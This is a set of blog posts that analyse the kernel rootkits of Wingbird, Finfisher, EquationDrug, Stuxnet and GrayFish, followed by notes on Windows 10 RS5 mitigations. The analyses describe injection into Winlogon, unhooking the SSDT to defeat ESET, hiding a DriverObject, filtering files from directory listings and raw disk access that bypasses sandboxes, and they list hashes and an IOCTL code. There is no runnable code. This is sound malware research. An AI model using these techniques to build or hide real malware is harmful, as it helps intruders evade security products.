Wingbird rootkit analysis

January 7, 2017, 9:54 am

≪ Previous: Windows exploitation in 2016

In previous blog posts I've described rootkits that have been used by so-called state-sponsored actors for infecting their victims, providing malware persistence and achieving SYSTEM privileges into a system. I've mentioned Remsec (Cremes) rootkit that was used by Strider (ProjectSauron) cybergroup and Sednit rootkit of APT28 (Fancy Bear) group. While Remsec rootkit has been used by operators for executing its code in kernel mode with SMEP bypass and developed in its original style, Sednit authors developed rootkit to hide their malware activity and footprints from user eyes in "usual rootkit manner".

Recently one security company that investigates activity of various cybergroups, has shared with me droppers of rootkits. I've been surprised during its analysis, because the rootkit is well protected from the analysis as well as its dropper. Analysis of both rootkits took enough time, because it contain various anti-research capabilities. Size of rootkit and dropper files was significantly increased due to using code obfuscation and the presence of much garbage instructions. Moreover, both rootkits belong to one cybergroup, were developed in targeted manner and are intended for specific victims.

Concept of "targeted" already long time discussed in AVers & security community as attribute of sophisticated cyberattacks, which often have state-sponsored origins. In past we saw a lot of cyberespionage operations in which have been used unique executable files that were developed for specific victims and software they use. Described in this blog post pieces of malware satisfy all the requirements, which researchers impose to highly targeted cyberattacks and possibly state-sponsored origins. I'm sure that this malware is a part of larger cyberespionage platform.

This malware as well as cyber espionage group, which leverages it, was mentioned by Microsoft MMPC in their blog post and Security Intelligence Report Volume 21 here. The group is called NEODYMIUM, while the malware is called Wingbird, Wingbird shares similarities with another famous commercial cyber espionage toolkit called Finfisher that detected by Symantec as Backdoor.Finfish.

Dropper 1

First dropper has following characteristics.

The dropper is well protected from various methods of static and dynamic analysis. It contains various anti- disasm/debug/VM/dump features.
The dropper contains very obfuscated code with jumps to middle of instructions, garbage instructions, useless checks, useless jumps, etc.
Because of using a lot of garbage instructions, size of dropper is large enough (1,3MB).
The dropper is designed so that to delay its analysis as long as possible.
It installs the rootkit into a system.
It drops rootkit into file with name logonsrv.dat.
It is intended only for rootkit dropping.

High entropy level of .text section is an indicator that code is encrypted and obfuscated.

The dropper and rootkit contain timestamp inside PE header that looks like legitimate.

Typical end of function in dropper.

All functions lead to one code.

That is very obfuscated and contains useless jumps.

Below are listed characteristics of Ring 0 rootkit.

The rootkit code is very obfuscated, making its statical analysis almost impossible.
The rootkit contains encrypted code and data inside.
It does not create device object and does not communicate with Ring 3 code.
It does not set any hooks in Windows kernel.
It is intended only for hidden injection of malicious code into trusted Winlogon process.
The rootkit creates its copy in allocated pool region that is also contains very obfuscated code.
It uses self-modifying code, for example, it can modify important call or jmp instructions with another address or another register.
It is designed to be hidden as far as it is possible and unloads its driver after code into Winlogon was injected.
It checks presence of ESET Helper Driver (ehdrv.sys) in a system and removes its SSDT (KiServiceTable) hooks.

Before doing main work, the rootkit prepares own code for execution.

It allocates two non-paged buffers. One with size 0x56000 for its driver and second with size 0x10000.
First buffer is used for storing newly created driver (in memory) that will do all necessary work and second buffer with some trampolines to NT kernel API.
The rootkit builds its IAT with 0x2F items that are located into section of new driver. But instead of using this IAT directly, the rootkit code takes these addresses and uses it for modifying instructions and variables in the code from second pool region.

It is worth to note that authors of rootkit took all possible steps to make rootkit analysis in memory much complicated. Advanced users also will have troubles with its detection via anti-rootkit tools.

The rootkit does not use its original image logonsrv.dat for performing main malicious tasks.
The rootkit does not rely on continuous IAT buffer in memory that can be used to simplify its analysis.
The rootkit does it main work from two allocated memory (pool) blocks with self-modifying code. One of these blocks is used as special trampoline for NT kernel API calls.
It uses KeDelayExecutionThread function before doing main work, i. e. before injection code into Winlogon.

Below you can see code from second allocated buffer with size 0x10000 that contains trampolines to imported by rootkit NT API. Another code from created driver (from first buffer) rewrites instructions in these trampolines with addresses from IAT.

After the end of preliminary actions, the rootkit calls ZwOpenKey for opening its registry key and reads value of ImagePath parameter with help of ZwQueryValueKey. Between two calls rootkit modifies own instructions as shown below.

After calling ZwQueryValueKey, the code has been modified again for calling PsCreateSystemThread.

The rootkit creates two threads with PsCreateSystemThread API and one of them is used for performing main malicious work. Below you can see the scheme of rootkit execution. It prepares code that will be injected into Winlogon and reads \KnownDlls\ntdll.dll section that represents content of Ntdll library for easy access. The rootkit also imports KeServiceDescriptorTable variable for getting address of KiServiceTable and restore items in this table.

It seems only one function in rootkit body was not obfuscated. This function specializes in enumeration of system modules. The rootkit code calls it several times, for getting NT kernel base address, Ntdll base address and for checking presence of ESET helper driver (ehdrv.sys). As you can see above, authors take interest in NT kernel files, because they need to restore original SSDT functions.

Interesting to note that authors have been used same scheme for obfuscating rootkit driver like they did in case of dropper. We can find same functions construction inside rootkit body.

As you can see on image above, all functions again lead to one code that is obfuscated with garbage instructions.

Also interesting that startup code in both dropper and driver didn't contain obfuscation. Considering above information and this fact, it seems that for obfuscation driver and dropper has been used one tool that launches process of obfuscation before compiler will generate code. i. e. on source code level.

The rootkit allocates three buffers into Winlogon process. First with size 0x100000, second 0x3000 and third 0x48000. The following Ntoskrnl functions are used by the rootkit.

Dropper 2

Next characteristics are related to second dropper.

Like first dropper, this dropper is well protected from various methods of static and dynamic analysis.
The dropper has same size 1.3MB.
The dropper drops Ring 0 rootkit into a file with name ndisclient.dat.

Some information about dropper behaviour.

Some characteristics of driver.

Designed to communicate with user mode client with help of device \Device\PhysicalDrive00 and symbolic link to it \DosDevices\PhysicalDrive00.
It has a smaller size than driver from first dropper (43 KB vs 372 KB).
It registers three IRP dispatch entry points for IRP_MJ_CREATE, IRP_MJ_CLOSE and IRP_MJ_DEVICE_CONTROL requests.
The rootkit checks presence of driver \Driver\diskpt (Shadow Defender shadowdefender.com) and \Driver\DfDiskLow DfDiskLow.sys (Deep Freeze Faronics Corp).
It contains code for parse object manager name space via functions ZwOpenDirectoryObject, ObQueryNameString.
It contains obfuscated, self-modificated code that is hard for both static and dynamic analysis.
Authors have provided DriverUnload function.
The rootkit is intended for FS sandbox bypassing and for modifying files directly on low hard disk level.

The rootkit allocates pool block in DriverEntry that is used for already familiar to us trampoline to NT kernel API (like in first driver).

Below you can see image with major steps of execution flow of rootkit's DriverEntry.

Part of IRP_MJ_DEVICE_CONTROL handler code is presented below.

The rootkit code in DriverEntry retrieves pointer to device object that represents hard disk(s) by port-driver (atapi). This information is used subsequently in code that dispatches IRP_MJ_DEVICE_CONTROL operation for sending synchronous requests to port-driver with standart set of functions:

MmMapLockedPagesSpecifyCache, IoAllocateMdl for work with non-paged memory and direct I/O.
IoBuildSynchronousFsdRequest, IofCallDriver to build a correponding IRP and send it to driver.
MmUnmapLockedPages, IoFreeMdl for releasing resources.

Below you can see table with characteristics of both analyzed drivers.

Conclusion

Authors of this malware took almost all efforts to hamper both the static and dynamic analysis. The first rootkit serves only for one purpose - to inject malicious code into Winlogon system process. It checks presence of ESET Helper Driver due to it ability to block rootkit malicious actions and attackers seems sure that their victim uses this security product. As you can see from the analysis due to high level of code obfuscation, it is useless to show images of rootkit code, because it do not help for building logic of its execution. Malware authors have used special instrument for droppers and rootkits obfuscation. It's not clear, why attackers did not care about rootkit persistence into a system and why it not guards own registry key.

Both rootkits are targeted on executing only one specific task: first is used for data/code injection into Winlogon and second to communicate with hard drive on low level. The rootkit from second dropper doesn't care about own persistence: the dropper removes its driver from disk once it was loaded into memory. It is worth to note that checking of presence of specific security products are correspond with the goals of both rootkits. For example, first driver checks presence of AV driver, when second driver is targeted only on system utilities that specialize on guarding a system from critical modifications.

Both security/system products Shadow Defender and Faronics Deep Freeze to leverage FS sandbox methods for blocking potential malicious actions for protected files in a system. This is an answer why attackers need low level disk access - they need to bypass FS sandbox and modify required files directly.

↧

Finfisher rootkit analysis

January 13, 2017, 4:09 am

≫ Next: EquationDrug rootkit analysis (mstcp32.sys)

≪ Previous: Wingbird rootkit analysis

My previous blog post was dedicated to very interesting malware that is called Wingbird. This malware has been used by NEODYMIUM cyber espionage group and contains rootkit to execute sensitive and important operations for attackers in a system. The first sample used rootkit for injection malicious code into Winlogon with removing ESET driver hooks in kernel SSDT, while second deploys rootkit for bypassing FS sandbox of several security products. Both droppers analyzed in 32-bit environment, while their behaviour in 64-bit Windows versions are interesting too and different from what we have seen in the 32-bit versions.

In 64-bit system, the dropper doesn't resort to the use of kernel mode rootkit (obviously, due to DSE restrictions) for injection malicious code & data into trusted Winlogon process. Instead this, it uses special trick for masking its malicious activity and for performing injection. The dropper uses copy of trusted LSASS process (executable file) and forces it to load malicious dll with standart name that is imported by LSASS.

64-bit GMER anti-rootkit tool demonstrates injection anomalies into Winlogon and Svchost, where malicious code is located.

The presence of virtual memory regions into Winlogon with the protection attribute PAGE_EXECUTE_READWRITE is an indicator that the process was compromised.

As I already noted in previous blog post, Wingbird malware shares similarities with another malware that is called Finfisher. For example, in malicious PE-file that was dumped from Winlogon memory region, we can see reference to name of Finfisher rootkit (mssounddx.sys).

After lsass service started, it injects code into winlogon and with help of ProcMon boot logging we can identify first actions that come from malicious code.

After some preliminary actions, malicious code into Winlogon tries to communicate with hard disk on low level, it requests disk geometry info and sends SCSI control code for reading data. In 32-bit version it uses rootkit to perform this operation.

It also checks presence of Finfisher files. See details in Symantec blog post here.

The following indicators show similarities between Wingbird and Finfisher.

I was able to get 32-bit version of mssounddx.sys rootkit. As you can see on screenshot below, authors masked its file as legitimate Microsoft driver.

Like Wingbird rootkit, Finfisher rootkit is protected from statical analysis. The code from DriverEntry and other functions in mssounddx.sys are representing a loader that decrypts content of BIN resource, where 2nd encrypted driver is located.

Rootkit code does following actions in DriverEntry.

1. It is looking for corresponding BIN resource into .rsrc section.

2. It allocates memory block from kernel pool and copies into it content of BIN resource with size 0xc180 (encrypted driver).

3. Decrypts data in allocated pool block.

4. Prepares PE-file of encrypted driver for work: applies fixups, fills some internal variables (ptrs to import functions).

5. Passes control to DriverEntry of decrypted driver.

Second driver uses following kernel functions.

Code injection.

Next picture demonstrates logic of 2nd driver execution.

Start of shellcode looks like.

Conclusion

As you can see from the analysis, we haven't seen something new in Finfisher rootkit. Like other drivers that are used by attackers, it is intended only for one purpose - for injection malicious code into Winlogon process. Nevertheless, authors use some anti-analysis tricks, including, driver encryption and obfuscation some data that driver keeps in kernel memory.

↧

EquationDrug rootkit analysis (mstcp32.sys)

March 30, 2017, 8:13 am

≫ Next: Stuxnet drivers: detailed analysis

≪ Previous: Finfisher rootkit analysis

Malware arsenal that have been used by very sophisticated & so-called state-sponsored cyber group named "Equation Group" already was perfectly described by Kaspersky in their report. As always, it is hard to make an assumption about attribution of this malware as well as about origins of such elite cyber group. Anyway, it's obviously that code development and the cost of infrastructure for cyberattacks in such scale took enough human and money resources. As regular readers of my blog could notice, now I'm concentrating on research of rootkits allegedly belong to sophisticated/state-sponsored cyber actors. It is also interesting to assess skills of authors in driver development and compare it with code from another similar "products".

In the last year Equation Group group was hacked by another hacking group called Shadow Brokers, who claimed that got access to secret sources of NSA cyber toolkits. As we already know, SB released some exploits and backdoors for routers/network devices of some vendors that belong to EG. The last leak from SB was dedicated to set of PE-files, which used by Equation Group for cyberespionage and named EquationDrug. Analyzed driver mstcp32.sys was taken from this leak.

The driver mstcp32.sys
(SHA256:26215BC56DC31D2466D72F1F4E1B6388E62606E9949BC41C28968FCB9A9D60A6) masked as "Microsoft TCP/IP driver".

Authors also took some steps to mask malicious purpose of this driver. For example, if you look to its imports or dump strings from file, you can't find something really suspicious. The driver imports API from NDIS kernel mode library called NDIS.SYS to work with network packets on physical level (that fully corresponds to its purpose). Actually, authors hid malicious indicators inside driver into encrypted data. Below you can see decrypted strings from driver's body.

As you can see from dumped strings above, the rootkit attaches itself to Windows network stack for capturing packets on NDIS level. Also, it is clear that the rootkit implements injection of malicious code into trusted Windows processes - Services.exe (SCM) & Winlogon.

Below you can see compilation date of this driver, which indicates that it was compiled already almost 10 years ago. This means that cyber espionage group used the rootkit and was active already in 2007. Also authors were interested to make their operations stealthy from user eyes, putting code into Ring 0.

Timestamp from debug directory matches with its analog from IMAGE_FILE_HEADER.

Below you can see screenshot of start rootkit code.

Malicious data decryption is a first step that takes the driver. After that it creates device object with name \Device\Mstcp32 and performs initialization steps. The device name doesn't hard coded into driver's body, it forms on base of driver service name (Mstcp32 as original name).

As you can see from image above, driver dispatches following IRP requests:

IRP_MJ_CREATE
IRP_MJ_CLOSE
IRP_MJ_READ
IRP_MJ_WRITE
IRP_MJ_DEVICE_CONTROL
IRP_MJ_CLEANUP.

The driver registers itself as NDIS filter. It checks interface with GUID {4d36e972-e325-11ce-bfc1-08002be10318} (that located into encrypted part of data) and gets list of instances that already registered in Windows. It tries to find specific instance with value LowerRange == "ethernet" into HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}\000X\Ndi\Interfaces. After driver code found it, it appends own value to this parameter as shown on image below.

As I already mentioned above, the rootkit was written by authors in 2007, so range of supported Windows versions is extremely small comparing with nowadays malware. Moreover, like other rootkits authors in that time, they use a lot of undocumented fields in kernel mode objects for retrieving the data they need. Next Windows NT versions are supported by the rootkit.

Windows NT 4.0 (1381)
Windows 2000 (2195)
Windows XP (2600)
Windows Server 2003 (3790)

You can see that the rootkit uses various undocumented offsets in EPROCESS and ETHREAD kernel objects for some purposes, including, enumerating running processes and threads, checking thread alertable state, retrieving pointer to PEB and etc.

Injection of malicious code into processes is made in usual for such rootkits manner: Attach_To_Process->Allocate_Virtual_Memory->InsertApc.

Conclusion

Unlike authors of other state-sponsored rootkits that were already mentioned in my blog, authors of mstcp32.sys don't rely on Windows native API for performing some operations, for example, for enumeration processes and threads. Instead this, they use undocumented kernel objects offsets for retrieving some data mentioned above. A significant portion of code in rootkit body is NDIS-oriented and dedicated to communication with network. There are a lot of Windows kernel rules for correctly organizing communication between NDIS driver and other parts of OS.

The rootkit driver supports IOCTL for sending data over network on NDIS level. This means that network logic of communicating with remote host is located into user mode part that use driver for this purpose.

↧

Stuxnet drivers: detailed analysis

April 13, 2017, 2:36 am

≫ Next: GrayFish rootkit analysis

≪ Previous: EquationDrug rootkit analysis (mstcp32.sys)

There has passed already a lot of time since the publication of various detailed researches about Stuxnet and its components. All top AV vendors wrote own comprehensive papers, which reveal major information about destructive Stuxnet features. Some information about Stuxnet rootkits were published by Kaspersky here, Symantec here, ESET here. However, the published information is not complete, because each of these documents covers only a specific sample of the rootkit and describes some of its functions. For example, Kaspersky analysis tries to summarize information about known Stuxnet drivers, but it doesn't contain any technical info about it. Another mentioned report from ESET contains information about two Stuxnet drivers, but this is not sufficient for complete summarizing.

First of all, it is need to be clear that from point of view of undocumented Windows kernel exploration, there are no something really interesting in Stuxnet drivers. I mean nothing interesting comparing with such advanced & sophisticated "civilian" rootkits like ZeroAccess or TDL4. These instances can be deeply embedded into a system, bypassing anti-rootkits and deceive low-level disk access tools. In contrast to them, authors of Stuxnet rootkits do not use such deep persistence into a compromised system. This analysis tries to summarize technical information about Stuxnet drivers.

As a starting point of our research, we can take already published information about Stuxnet drivers by Kaspersky. Their analysis Stuxnet/Duqu: The Evolution of Drivers summarizes some information about drivers that have been used by Stuxnet authors in cyber attacks.

Driver 1
File name: MRxCls.sys
SHA256: 817a7f28a0787509c2973ce9ae85a95beb979e30b7b08e64c66d88372aa3da86
File size: 19840 bytes
Signed: No
Timestamp: 2009-01-01 18:53:25
Device object name: \Device\MRxClsDvX
Main purpose: code injection
AV detection ratio: 53/61

First driver contains sensitive text information such as rootkit device name and path to its service into registry as encrypted data. After starting, the driver performs decryption of this data and we can extract it. Note that name of rootkit service is almost matches its device object name. First dword of decrypted data is also interesting, because it stores some flags, which have an impact on driver behaviour. For example, first bit of this dword restricts the work of rootkit code into Windows safe mode, while second is used as anti-debug trick. If second bit and ntoskrnl!KdDebuggerEnabled are active, the driver will not load.

Decrypted rootkit data also stores name of registry value (Data) that is used by the rootkit to determining what files should be injected into processes. So, these decrypted data are stored in the next sequence.

\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\MRxCls
Data
\Device\MRxClsDvX

As driver is registered by Stuxnet with "boot" loading type, it can't perform whole initialization in DriverEntry, because neither NT kernel nor file system is ready to perform requests from clients. So, it calls API IoRegisterDriverReinitialization and delays own initialization. After ReInitialize rootkit function gets control, it checks Windows NT version and fills some dynamic imports. It also doing some preparatory operations and calls PsSetLoadImageNotifyRoutine for registering own handler on load image. This handler will response for code injection into processes. Below you can see scheme of rootkit initialization.

The driver registers following IRP handlers.

IRP_MJ_CREATE
IRP_MJ_CLOSE
IRP_MJ_DEVICE_CONTROL (fnDispatchIrpMjDeviceControl)

If you are not familiar with Windows NT drivers development, it is worth to note that any driver that allows to open handles on its device, registers, at least, two IRP handlers: IRP_MJ_CREATE for supporting operations ZwCreateFile and IRP_MJ_CLOSE for ZwClose. Our driver supports ZwDeviceIoControl interface, that's why it registers IRP_MJ_DEVICE_CONTROL handler.

Handler fnDispatchIrpMjDeviceControl serves only for one purpose: to call undocumented Windows NT function ZwProtectVirtualMemory. Client should send to driver special IOCTL code 0x223800 for that (DeviceIoControl) and provide a special prearranged structure with parameters for API call. The driver uses buffered I/O.

As we know, function ZwProtectVirtualMemory is not exported by the Windows kernel and this is another task which authors of MRXCLS.sys have been solved. For example, in case of Windows 2000, they try to find function signature with analysis of executable sections of ntoskrnl image. This signature you can see below.

Authors are trying to enumerate all useful ntoskrnl sections and for each of it call special function that performs searching ZwAllocateVirtualMemory by signatures on Windows 2000 or little harder on Windows XP.

Main purpose of this Stuxnet rootkit is code injection. As we can see from its code, the driver tries to read configuration data of injection either from registry parameter Data, either from file, if its name is present into malware sample. In analyzed sample, name of configuration file is absent. Injection configuration data is prepared by user mode part of malware. Injection mechanism was perfectly described by ESET in their paper. The driver performs injection into process in two phases: first phase is preparatory and second is major.

On second phase it tries to read content of file, decrypts it and injects it into process address space. File names for injection are stored into configuration file or registry parameter Data.

As we can see from the code analysis, authors have developed rootkit for injection malicious code into processes. Data for injection is prepared by Stuxnet user mode code. The driver registers handler for image load notify and performs injection into two phases. It also supports one IOCTL command for changing protection for virtual memory pages of process with help of ZwProtectVirtualMemory. For finding this unexported and undocumented function into ntoskrnl, it uses raw bytes search based on special signatures.

Driver 2
File name: Mrxnet.sys
SHA256: 0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198
File size: 17400 bytes
Signed: Yes
Timestamp: 2010-01-25 14:39:24
Device object name: none
Main purpose: malicious files hiding
AV detection ratio: 51/61

Unlike first driver MRXCLS.sys, authors of Mrxnet.sys don't perform anti-analysis checks in the start function of driver. Mrxnet.sys is a FS filter driver that controls some file operations. The rootkit tries to hide some file types by controlling IRP_MJ_DIRECTORY_CONTROL request and removes information about it from buffer.

The rootkit initialization steps.

As we can see from code, the driver plays with two types of devices: firstly its own CDO (Control Device Object) that represents FS filter and secondly devices that were created to filter files related operations on specific volumes. In case of CDO, the rootkit dispatches widely known request IRP_MJ_FILE_SYSTEM_CONTROL and operation IRP_MN_MOUNT_VOLUME. This operation is used by Windows kernel in case of mounting new volume into a system. After got this request, the rootkit creates new device object, registers completion routine and attaches device to newly mounted device. This method allows for driver to monitor appearance in a system new volumes, for example, volume of removable drive.

As you can see from the picture above, the driver also calls IoRegisterFsRegistrationChange I/O manager API for registering its handler that Windows kernel will call each time, when new file system driver CDO is registered into a system. In this handler, the driver creates new device and attaches it to passed CDO or removes device in case of file system driver deletion.

Major purpose of Mrxnet.sys driver is hiding Stuxnet malicious files. Windows kernel provides ZwQueryDirectoryFile API for requesting information about files in directory. This API function calls driver handler of IRP_MJ_DIRECTORY_CONTROL operation. So, the rootkit registers own IRP_MJ_DIRECTORY_CONTROL handler and sets completion routine when such request is passed through handler. In this completion routine it analyzes buffer with data and checks file names in it. It erases from buffer files with extension .LNK and .TMP. It also imposes additional restrictions on hiding. For example, in case of .LNK file, its size should be equal 0x104B.

It should be noted that such technique of files hiding were described in famous book "Rootkits: Subverting the Windows kernel" by Hoglund, Butler.

Driver 3
File name: Jmidebs.sys
SHA256: 63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802
File size: 25552 bytes
Signed: Yes
Timestamp: 2010-07-14 09:05:36
Device object name: \Device\{3093983-109232-29291}
Main purpose: code injection
AV detection ratio: 50/61

This driver is pretty similar to MRxCls.sys and serves only for code injection into processes. The following properties distinguish it from original MRxCls.sys.

New device object name - \Device\{3093983-109232-29291}
New registry service name - jmidebs
New registry service parameter name (injection data) - IDE
New IOCTL code for reading (caching) configuration data
New constants in decryption routine.

Decrypted strings.

\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\jmidebs
IDE
\Device\{3093983-109232-29291}

The rootkit contains additional IOCTL function, which specializes in caching configuration data. This data are used for injection malicious Stuxnet code.

Driver 4
File name: MRxCls.sys
SHA256: 1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c
File size: 26616 bytes
Signed: Yes
Timestamp: 2009-01-01 18:53:25
Device object name: \Device\MRxClsDvX
Main purpose: code injection
AV detection ratio: 50/61

This sample is identical to driver 1, but signed with digital certificate. Both samples have identical timestamp value in PE header and identical code inside.

Conclusion

As we can see from the analysis, authors of Stuxnet Ring 0 part were interested in code injection and malicious files hiding. Driver MRxCls.sys has two instances, one unsigned and another with digital signature. Both drivers are identical and contain same compilation date. Driver Jmidebs.sys was compiled later than these two and I can call it "MRxCls.sys v2", because it contains some differences inside, but serves for same purpose. Driver Mrxnet.sys is a typical legacy FS filter driver that is used by attackers for hiding files in Windows.

↧

GrayFish rootkit analysis

May 17, 2017, 6:18 am

≫ Next: Windows 10 RS5 introduces a new Software PTE type

≪ Previous: Stuxnet drivers: detailed analysis

Earlier in this year, I published research of the rootkit that belong to famous state-sponsored cybergroup called "Equation Group". Analyzed rootkit actually represents one of the Windows kernel mode network implant, which has been used by cybergroup as a network traffic sniffer on NDIS level. As we know from comprehensive research of Kaspersky Lab, Equation Group has an arsenal of various sophisticated malware, such as EQUATIONDRUG, DOUBLEFANTASY, TRIPLEFANTASY, GRAYFISH, etc. This arsenal of malware is pretty complex and sufficient for performing cyberattacks that allegedly have state-sponsored origins (NSA). As we know, not only Equation Group leverages kernel mode rootkits, for example, Sednit (APT28, Fancy Bear, Pawn Storm) and Strider cybergroups also resort to the same.

Unlike other malware families of Equation Group, GRAYFISH has on board Windows kernel rootkit for performing malicious operations in high privileged Ring 0 mode. Moreover, like other state-sponsored rootkits that were mentioned previously in my blog, GrayFish (or Trojan.Win32.GrayFish.b as Kaspersky called it) is pretty interesting for the analysis. As we can see from previous instances of such malware, their authors can choose non standard ways for rootkit development.

Typically, malware from cyberespionage platforms leverage kernel mode rootkits to achieve following advantages.

Independent from user mode context method of files hiding, for example, with help of legacy FS filter (Stuxnet).
Universal method of code injection based on Windows kernel callbacks (Stuxnet, EquationDrug). Also code injection into trusted Windows processes for masking malicious activity (Finfisher, EquationDrug).
Execution of necessary user mode code directly in kernel mode (Remsec).
To bypass Windows x64 kernel mode restrictions (DSE) with bootkit component (Sednit, GrayFish).
To listen network traffic directly from physical network adapter (EquationDrug).
To bypass FS/disk level sandboxes as well as other restrictions into a system with security products (Wingbird).

I found rootkit file in resource section of another module (DLL) that is also a part of GrayFish cyberespionage platform. Below you can see compilation date of this DLL. The driver is stored into resource section in non-encrypted state and can be dumped from section with help of Resource Hacker tool.

Despite DLL stores the rootkit file, it doesn't load him into memory. I suppose that driver loader is located in another GrayFish module. However, code inside the library communicates with driver via DeviceIoControl API. The rootkit supports various IOCTL codes for performing necessary operations.

The rootkit has the following properties.

It creates unnamed device object, but registers IRP dispatch functions.
It dispatches IOCTL requests.
It specializes in run-time patching of Windows kernel code.
It has huge driver size (153 600 bytes).
It сontains an inarticulate logic of work, which means that it developed for targeting on one specific goal, but later was modified for another.

Authors of rootkit choose interesting way of its initialization. The rootkit file seems should be patched before loading into memory for storing special process identifier. When it's time to initialize DriverObject and performing other initialization steps, the rootkit code retrieves hardcoded into its body process id and tries to get address of process object with PsLookupProcessByProcessId API. After code got pointer to process, it performs attaching into it address space with KeAttachProcess. Recall that rootkit's DriverEntry function is executed into context of the System process address space.

In this way, if you try to load the rootkit manually, you will get BSOD or get the absence of any activity.

On first step of initialization, the rootkit builds its own buffer of NT kernel exports and its hashes in following format: +0 FuncHash; +4 FuncAddr. It contains internal function for extracting specific item (function address) from this table by hash of function (NT export) name.

The rootkit also retrieves pointers to dynamic imports in the following way. It uses functions hal!HalAllocateCommonBuffer or nt!MmIsAddressValid for retrieving start address of hal.dll (HAL) or ntoskrnl (NT). Name of both functions are encrypted into its body and are decrypted on stack.

Next imports the rootkit tries to get during initialization phase (hash -> API).

As we know, Equation Group is known as professional in cryptography, their malware from cyberespionage platform leverage various crypto methods and algorithms that we haven't seen before in such scale. Looks like their love of encryption covers and kernel mode component too. The rootkit stores sensitive strings in encrypted state and doesn't decrypt it inside loaded in memory image, instead it copies necessary data on stack and decrypts it. Before exiting the function, it encrypts string on stack again.

After got address of HalAllocateCommonBuffer (or MmIsAddressValid), the rootkit tries to find start address of hal.dll for further retrieving addresses of dynamic imports. Interesting to see that pointers to HAL or NT functions the rootkit stores in memory in encrypted state, as shown above (it XORed value of each ptr with its offset). Same situation with NT imports, all stored into rootkit image as encrypted.

The rootkit uses some sort of code and data obfuscation, although stores imports of kernel API in the clear state (PE IAT). For masking its activity from researchers eyes, the rootkit creates new driver object with name \Driver\msvss, so after exiting from DriverEntry, original Windows kernel DriverObject will contain no information about created DeviceObject of rootkit as well as about its IRP_MJ handlers.

This method of hiding real DriverObject was used by Remsec rootkit authors. My part 2 of Remsec driver research contains information about this technique. The rootkit calls ObCreateObject for creating new DriverObject, ObInsertObject to create handle and ObMakeTemporaryObject for removing name of the object from its parent object manager directory \Driver\ (hiding from researchers eyes).

Before creating new DriverObject, the rootkit tries to get pointer to another specific system driver object. It contains encrypted names of four drivers listed below. Next, it tries to analyze all driver objects and is looking for one, which contains non-zeroed DriverSection field and checks if DriverObject->MajorFunction[IRP_MJ_CREATE_NAMED_PIPE] handler is located into ntoskrnl image.

In my case the rootkit choose \Driver\mountmgr.

During new driver object initialization, the rootkit copies some fields from \Driver\mountmgr into newly created DriverObject. It also copies value of DriverObject->MajorFunction[IRP_MJ_CREATE_NAMED_PIPE] of MountMgr into IRP_MJ handlers of the new driver. Later, it rewrites these handler with pointer to one dispatch function.

Next step of the rootkit execution is really interesting. It tries to get handle (FileObject) on its own device object calling IRP_MJ_CREATE handler directly with IoCallDriver. But before doing this, it creates handle to reserved system device object \Device\NULL that belong to driver \Driver\Null. Further, it hijacks DeviceObject field into Null FileObject on rootkit device object and uses this FileObject for sending IRP_MJ_Create request.

Despite pretty clear logic of driver initialization, execution logic of remaining rootkit code is really incomprehensible. For example, created by rootkit table of ntoskrnl exports is used only in one case, when the rootkit receives special IOCTL code.

Next characteristics show inarticulate logic of rootkit work.

As mentioned above, the rootkit builds table of ntoskrnl exports that stores pointers to functions and hashes of names. Strange thing is that the rootkit uses this table only one time during dispatching IOCTL request.
As mentioned above, the rootkit has function for retrieving ntoskrnl API by its function name hash. It also uses obfuscation of pointers to these functions. Another strange thing is that it uses this method only in specific code pieces, like it was written by one person and recently was ignored by another.
It is unclear how user mode code connects to rootkit for sending IOCTL, because rootkit's device object is unnamed.

Conclusion

GrayFish rootkit looks really strange...beginning from its initialization and finishing its objectives. If we run rootkit driver on machine and next scan it with various anti-rootkits, we will see no suspicious activity. This means that by default rootkit sets no hooks on Windows kernel functions like other rootkits. The rootkit also not registers any callback functions, for example, on process creation or modules loading.

Unlike other civilian and state-sponsored rootkits, GrayFish doesn't explore Windows kernel mode to monitor system's activity or hiding files on disk. At the same time it contains the code for patching Windows kernel functions. This code can be activated later.

Like other rootkits, GrayFish contains code for code/data injection into processes with help of ZwOpenProcess/PsLookupProcessByProcessId/KeStackAttachProcess. While rootkit works with user mode memory during injection, it calls interesting system function - MmSecureVirtualMemory. All instructions it receives from user mode client.

↧

Windows 10 RS5 introduces a new Software PTE type

October 3, 2018, 11:23 am

≫ Next: What is a Proto-PTE and how Windows VMM works with it

≪ Previous: GrayFish rootkit analysis

As we already know, Microsoft tries to roll out a new security features (aka exploit mitigations) with each release of Windows 10 (RS_X). In previous releases was spotted a built into the OS EMET (aka Exploit Protection), Controlled Folder Access (Anti-Ransom_Encoder), KPTI, IOMMU devices support, Arbitrary Code Guard (ACG), Spectre-related mitigations, etc. A comprehensive list of such improvements could be found in the document Mitigate threats by using Windows 10 security features and presentation of Matt Miller and Dave Weston at BH USA 2016 called Windows 10 Mitigation Improvements.

In this blog post I'll try to describe some new Windows 10 RS5 kernel changes as well as other security features that Microsoft has introduced with this Windows release. Here are some findings: RS5 brings new type of PTE, improves support of Intel's CET technology, offers a special mitigation into the VMM to harden from L1TF vulnerability, introduces so-called Security Domains into the NT kernel.

L1TF mitigation

L1 Terminal Fault is already a well-known vulnerability that is related to speculative execution side channel attacks. But unlike previous Spectre cases, L1TF relies on the fact that speculative execution makes it possible to track data located at a physical page (PFN) that is actually not used in any valid VMM' PTE. In other words, the CPU speculatively addresses to invalid PTE that is still pointing to some PFN while Windows dispatches #PF exception. More details in Matt Miller blog post.

After MS has released a security update for L1TF mitigation, I have checked the ntoskrnl and found a way they fix this vulnerability. As Matt wrote into blog post, the VMM just corrupts PFN fields inside invalid PTE thus if CPU will try to translate this PTE speculatively, it just simply will get fake physical address that points to beyond the borders of memory.

As we know from the VMM internals, Transition PTE type is exactly that type may be used for L1TF attack. The VMM translates valid PTE to Transition state, when it becomes useless for a caller process. For example, process commits memory -> process frees memory (PTE becomes from Valid state to Transition). After Transition state, the VMM set it to another state and leave a note into the PFN database. MS has added MiSwizzleInvalidPte for VMM to corrupt PFN field into Transition PTE.

Look ADV180018 | Microsoft Guidance to mitigate L1TF variant

The new FileInfo classes

Windows 10 RS5 introduces new members of famous FILE_INFORMATION_CLASS enumeration that are hinted that you can get access to more information about files in this new Windows release.

